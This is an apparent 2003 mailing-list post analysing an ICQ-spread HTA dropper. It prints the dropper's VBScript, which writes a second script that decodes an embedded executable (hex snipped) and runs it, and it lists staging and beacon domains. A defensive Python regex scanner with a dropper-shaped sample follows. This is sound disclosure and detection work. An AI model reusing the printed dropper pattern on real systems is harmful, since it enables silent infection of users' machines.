New Virus?

From: Michael Bemmerl (security_at_ASTROBOX.NET)
Date: 12/06/03

    Date:         Sat, 6 Dec 2003 00:04:23 +0100
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    Hi everybody!

    Today I got an ICQ message from a user called "Monica" (just search on ICQ:
    http://people.icq.com/whitepages/search_results/1,,,00.html?FirstName=Monique&LastName=&NickName=Monica&Country=49).
    In her details is a URL: http://www.rsngermany.com/my_foto.htm This is a
    fake 404 error page, because in the <head> tags is a link to
    http://www.rsngermany.com/dn2.hta :

    [HTML]
    [HEAD]
    [TITLE]Windows Update[/TITLE]
    [HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none"
    BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no"
    MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no"
    SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/]
    [SCRIPT LANGUAGE="VBScript"]
    MyFile = "q.vbs"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set TSO = FSO.CreateTextFile(MyFile, True)
    TSO.write "WScript.Sleep(50000)" & vbcrlf
    TSO.write "szBinary = szBinary & ""4D5A...snip...0000000"" & szZeroLine" & vbcrlf
    TSO.write "szApplication = ""x.exe""" & vbcrlf
    TSO.write "Set hFSO = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf
    TSO.write "Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)" & vbcrlf
    TSO.write "intLength = len(szBinary)" & vbcrlf
    TSO.write "intPosition = 1" & vbcrlf
    TSO.write "while intPosition [ intLength" & vbcrlf
    TSO.write "char = Int(""&H"" & Mid(szBinary, intPosition, 2))" & vbcrlf
    TSO.write "hFile.Write(Chr(char))" & vbcrlf
    TSO.write "intPosition = intPosition+2" & vbcrlf
    TSO.write "wend" & vbcrlf
    TSO.write "hFile.Close" & vbcrlf
    TSO.write "Set hShell=CreateObject(""WScript.Shell"")" & vbcrlf
    TSO.write "hShell.run(szApplication+"" ""+szURL)" & vbcrlf
    TSO.close
    Set TSO = Nothing
    Set FSO = Nothing
    # Dim WshShell
    # Set WshShell = CreateObject("WScript.Shell")
    # WshShell.Run "q.vbs", 0, false
    [/SCRIPT]
    [script]window.close()[/script]
    [/HEAD]
    [/html]

    The .hta creates a file named q.vbs, which creates and runs x.exe. Notice the
    unset parameter szURL in q.vbs (I assume that you can specify where to
    download the next files; empty could mean that the files are loaded from
    the coded location: http://rsngermany.com). The x.exe is FSG-packed; you can
    unpack it with Un-FSG! (just google for it). The file will download another
    exe file, disguised as a jpg: http://www.rsngermany.com/3.jpg

    I tested this exe with wine; it creates two files in the Windows directory:
    msreg.exe and fghy.exe (again packed with FSG) and two in system32:
    svchostc.exe and svchosts.exe. Maybe it creates some run entries in the
    registry, but I couldn't test this. And it sends requests to various domains:

    All requests end in 404 errors, except two (see end of list).
    (Replace * with d and f.)

    comdat.de/kreta/yif.php
    www.dataforcecg.com/webvision/yi*.php
    www.eurostretch.ru/yi*.php
    www.hhc-online.de/home/links/pics/yi*.php
    www.courie.ru/style/yi*.php
    mucuc.h10.ru/forum/yi*.php
    www.gran-pri.ru/yi*.php
    www.mir-auto.ru/yi*.php
    artesproduction.com/yif.php

    comdat.de/kreta/yid.php --> 301, redirection to comcat.de/kreta/zid.php
    comdat.de/kreta/zid.php --> 200, just prints out your IP. Maybe the author
    logs infected PCs.
    artesproduction.com/yid.php --> 200, again prints out the IP

    The svchosts.exe has some HTTP response messages for errors 400, 502 and 503.

    I tested the files with NAV2003, latest def., no infection.

    Any ideas what it could be?

    Greetings,
    Michael
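A defender-side heuristic scanner for the dropper pattern quoted in this post (hidden HTA window, FileSystemObject write, hex-to-byte decode loop, embedded "MZ" image, WScript.Shell run), added here as an example that is not part of the original message or of any vendor tool. The indicator names, the scoring threshold and both sample scripts are constructed assumptions for illustration.

```python
import re

# Each indicator mirrors one building block of the quoted dn2.hta dropper.
# Quotes are matched as one or two characters because VBScript doubles them
# inside string literals (the HTA writes a second script as text).
INDICATORS = {
    "hidden_hta_window": re.compile(
        r'HTA:APPLICATION[^>\]]*?(SHOWINTASKBAR="no"|WINDOWSTATE="minimize")',
        re.I | re.S),
    "fso_textfile_write": re.compile(r'Scripting\.FileSystemObject', re.I),
    "hex_decode_loop": re.compile(r'Int\("{1,2}&H"{1,2}\s*&\s*Mid\(', re.I),
    "embedded_pe_hex": re.compile(r'"4D5A', re.I),       # "MZ" header as hex
    "shell_run": re.compile(r'WScript\.Shell.{0,200}?\.run\(', re.I | re.S),
    "self_closing_window": re.compile(r'window\.close\(\)', re.I),
}


def scan_script(text):
    """Return the names of all indicators present in an HTA/VBScript source."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def classify(text, threshold=3):
    """Label a script 'suspicious' when at least `threshold` indicators co-occur.

    The threshold is an assumed tuning value; any single indicator is common in
    legitimate scripts, the combination is what characterises this dropper.
    """
    hits = scan_script(text)
    return ("suspicious" if len(hits) >= threshold else "unremarkable", hits)


# Constructed sample shaped like the quoted dropper (the PE hex is a stub).
SAMPLE_HTA = r'''<HTA:APPLICATION ID="Q" SHOWINTASKBAR="no" WINDOWSTATE="minimize"/>
<SCRIPT LANGUAGE="VBScript">
Set FSO = CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.CreateTextFile("q.vbs", True)
TSO.write "szBinary = ""4D5A9000...snip..."" " & vbcrlf
TSO.write "char = Int(""&H"" & Mid(szBinary, intPosition, 2))" & vbcrlf
TSO.write "Set hShell=CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "hShell.run(szApplication)" & vbcrlf
</SCRIPT>
<script>window.close()</script>'''

# Constructed benign HTA for comparison: visible window, no file or shell use.
BENIGN_HTA = '''<HTA:APPLICATION ID="hello" APPLICATIONNAME="hello"/>
<SCRIPT LANGUAGE="VBScript">
MsgBox "Hello from a plain HTA"
</SCRIPT>'''

if __name__ == "__main__":
    print(classify(SAMPLE_HTA))
    print(classify(BENIGN_HTA))
```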

